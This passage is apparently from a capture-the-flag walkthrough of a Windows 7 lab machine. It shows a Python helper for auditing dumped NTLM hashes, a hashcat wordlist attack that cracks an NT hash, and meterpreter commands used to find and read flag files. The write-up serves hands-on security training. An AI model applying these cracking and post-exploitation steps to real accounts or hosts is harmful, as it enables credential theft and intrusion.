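        "lm_stored": lm != EMPTY_LM,       # a real LM hash means a trivially crackable legacy hash
        "blank_password": nt == EMPTY_NT,  # NT hash of the empty string
        "hashcat_line": nt,                # what goes into ntlm.txt for hashcat -m 1000
    }


def audit(dump):
    return [parse_pwdump(line) for line in dump.splitlines() if line.strip()]


def verify_nt(candidate, nt_hex):
    """True if the candidate password produces the given NT hash."""
    return nt_hash(candidate) == nt_hex.lower()


if __name__ == "__main__":
    for entry in audit(SAMPLE_HASHDUMP):
        status = "blank password" if entry["blank_password"] else entry["hashcat_line"]
        print(f"{entry['user']} (RID {entry['rid']}): {status}")
```

The built-in Administrator and Guest accounts are disabled by default on Windows 7, so their empty-string NT hash is expected here; the finding worth acting on in a real audit is an enabled account whose NT hash equals EMPTY_NT, or any account whose LM field is not EMPTY_LM, meaning the weak LM hash is still being stored.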

Below is the hashcat command. The backticks run cat ntlm.txt and substitute its output (the hash) into the command line, and rockyou.txt is used as the wordlist.

-m 1000 - NTLM hash mode (as identified by hashid above)
-a 0 - straight attack mode (wordlist)
-o - writes the cracked passwords to a file called cracked.txt
--force - ignores hashcat's warnings, needed here because hashcat is running in a VM

> hashcat -m 1000 -a 0 `cat ntlm.txt` /usr/share/wordlists/rockyou.txt --force -o cracked.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel Core Processor (Skylake, IBRS), 2048/5918 MB allocatable, 4MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=1000 -D _unroll'
* Device #1: Kernel m01000_a0-pure.ad7daebd.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: ffb43f0de35be4d9917ac0cc8ad57f8d
Time.Started.....: Sun Apr 12 15:34:56 2020 (4 secs)
Time.Estimated...: Sun Apr 12 15:35:00 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2885.2 kH/s (0.29ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel

Started: Sun Apr 12 15:34:46 2020
Stopped: Sun Apr 12 15:35:01 2020
> cat cracked.txt
ffb43f0de35be4d9917ac0cc8ad57f8d:PASSWORDHERE
>

TASK 5 - FIND FLAGS!

1. Flag1? (Only submit the flag contents {CONTENTS})

We can use meterpreter to search for the flag files.

meterpreter > search -f flag*
Found 6 results...
    c:\flag1.txt (24 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk (482 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk (848 bytes)
    c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk (2344 bytes)
    c:\Users\Jon\Documents\flag3.txt (37 bytes)
    c:\Windows\System32\config\flag2.txt (34 bytes)
meterpreter >

We can see above that all three flag files are found; we just need to read them now.

c:\>more flag1.txt
more flag1.txt
flag{FLAG1}

2. Flag2? *Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.

c:\Windows\System32\config>more flag2.txt
more flag2.txt
flag{FLAG2}

3. Flag3?

C:\Users\Jon\Documents>more flag3.txt
more flag3.txt
flag{FLAG3}
